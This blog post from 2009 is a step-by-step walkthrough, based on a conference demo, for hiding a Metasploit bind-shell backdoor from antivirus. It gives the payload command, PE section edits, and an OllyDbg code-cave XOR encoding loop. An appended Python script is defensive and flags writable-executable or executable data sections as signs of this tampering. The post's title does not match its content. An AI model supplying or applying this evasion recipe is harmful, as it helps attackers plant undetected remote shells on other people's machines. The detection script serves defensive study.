Friday, May 15, 2009

What To Do When You Have To Run With Your Period

Execution flow hijack + XOR encryption



*** Based on the demo by Muts at ShmooCon ***

Backtrack:
msfpayload windows/shell_bind_tcp LPORT=55555 X > bindtcp.exe

Windows:
Click on the file ==> bind shell on port 55555
check: netstat -na | find "55555"


PEditor
.idata: vsize: 500 - rsize: 400

hexedit:
+ 200 (hex) bytes


--------------
- OllyDbg -
--------------

first instructions:
00401000 >  31C0          XOR EAX,EAX
00401002    68 34104000   PUSH 00401034
00401007    64:FF30       PUSH DWORD PTR FS:[EAX]
0040100A    64:8920       MOV DWORD PTR FS:[EAX],ESP
0040100D    6A 40         PUSH 40

Code cave: 00401066
start: 00401002
end: 00401060

XOR loop:
MOV EAX, 00401002       # Start address of the region to encode.
XOR BYTE PTR DS:[EAX], 5E   # XOR the byte EAX points to with the key 5E
INC EAX                 # Advance to the next byte
CMP EAX, 00401060       # Have we reached the end of the region to encode?
JLE SHORT xxx           # If not, jump back to the XOR instruction


After the loop:
XOR EAX,EAX (the overwritten instruction)
JMP 00401002 (the address following the overwritten instruction)


------------------
Comments
------------------


1 - Create a bind_tcp payload
msfpayload windows/shell_bind_tcp LPORT=55555 X > bindtcp.exe (for example)

2 - Scan it via VirusTotal (result ...)
3 - Click on the payload and verify that the port is open
netstat -na | find "55555"

4 - Open the payload in PEditor
- Modify the .idata section:
vsize: 500 & rsize: 400
It must be readable, writable and executable.
- Modify the .text section (readable, writable and executable)
Save

5 - Open the payload with Hexedit
Append 200 (hex) bytes
Since initial rsize = 200 and new rsize = 400: 400 - 200 ==> 200. Save


6 - Start the payload in OllyDbg
- First, copy the initial instructions into Notepad (to keep a record of the instructions that will be replaced)
- Find space for a "code cave"
- Return to the OEP (entry point) and replace the first instruction with "JMP address-of-code-cave"
- Define/locate the address at which encoding must start
- Define/locate the address at which encoding must end, and update the ASM loop with these addresses
- After the loop, insert the instruction(s) that were replaced by the JMP at the beginning
- Finally, end with a JMP to the address [00401002] that follows the replaced instruction
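Step 4 is the part of this procedure that leaves a static fingerprint: a legitimate linker does not mark .text writable or .idata executable, so a file in which section headers carry both MEM_WRITE and MEM_EXECUTE, or in which a data section is executable, stands out before anything is run. The checker below is an added example written for this page, not code from the original post or from Muts' demo; it parses the COFF section table with only the standard library and flags those two conditions. The two in-memory PE images it builds are constructed samples with zeroed optional headers (the sizes 500/400 for .idata come from the page; everything else is made up), so it runs offline.

```python
import struct

# Section characteristic flags from the PE/COFF specification.
IMAGE_SCN_CNT_CODE    = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ    = 0x40000000
IMAGE_SCN_MEM_WRITE   = 0x80000000

# Sections that normally hold data, never code; executable bits on these are a tampering sign.
DATA_SECTION_NAMES = {".idata", ".data", ".rdata", ".rsrc", ".reloc"}


def parse_sections(data):
    """Return the section table of a PE image as a list of dicts (name, vsize, rsize, chars)."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4                                  # IMAGE_FILE_HEADER starts after "PE\0\0"
    (num_sections,) = struct.unpack_from("<H", data, coff + 2)
    (opt_size,) = struct.unpack_from("<H", data, coff + 16)
    table = coff + 20 + opt_size                         # section headers follow the optional header
    sections = []
    for i in range(num_sections):
        name, vsize, vaddr, rsize, raw_ptr, _, _, _, _, chars = struct.unpack_from(
            "<8sIIIIIIHHI", data, table + i * 40)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "vsize": vsize, "rsize": rsize, "chars": chars})
    return sections


def find_suspicious(sections):
    """Flag writable+executable sections and executable data sections; returns (name, reason) pairs."""
    findings = []
    for s in sections:
        c = s["chars"]
        if (c & IMAGE_SCN_MEM_WRITE) and (c & IMAGE_SCN_MEM_EXECUTE):
            findings.append((s["name"], "writable and executable (RWX)"))
        if s["name"] in DATA_SECTION_NAMES and (c & IMAGE_SCN_MEM_EXECUTE):
            findings.append((s["name"], "data section marked executable"))
    return findings


def build_pe(section_specs):
    """Constructed helper: build a minimal PE32 image with only the headers this checker reads."""
    opt_size = 0xE0                                      # size of a PE32 optional header, left zeroed
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)              # e_lfanew: PE header right after the DOS stub
    coff = struct.pack("<HHIIIHH", 0x14C, len(section_specs), 0, 0, 0, opt_size, 0x0102)
    headers = b""
    for i, (name, vsize, rsize, chars) in enumerate(section_specs):
        headers += struct.pack("<8sIIIIIIHHI", name.encode(), vsize, 0x1000 * (i + 1),
                               rsize, 0x400 * (i + 1), 0, 0, 0, 0, chars)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt_size) + headers


# Constructed sample: how a compiler-built binary normally looks.
CLEAN_PE = build_pe([
    (".text", 0x100, 0x200, IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_EXECUTE),
    (".idata", 0x200, 0x200, IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
])

# Constructed sample: the same layout after step 4 of the post (.text and .idata made RWX,
# .idata grown to vsize 500 / rsize 400 to make room for the code cave).
TAMPERED_PE = build_pe([
    (".text", 0x100, 0x200, IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE | IMAGE_SCN_MEM_EXECUTE),
    (".idata", 0x500, 0x400, IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE | IMAGE_SCN_MEM_EXECUTE),
])

if __name__ == "__main__":
    for label, image in (("clean", CLEAN_PE), ("tampered", TAMPERED_PE)):
        print(label, find_suspicious(parse_sections(image)))
```

Run against a real file with `find_suspicious(parse_sections(open(path, "rb").read()))`. A hit is a reason to look closer, not a verdict: packers and some legacy build tools also emit RWX sections, so the check is best combined with the entry-point jump pattern the post describes (a JMP at the OEP into a non-code section).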
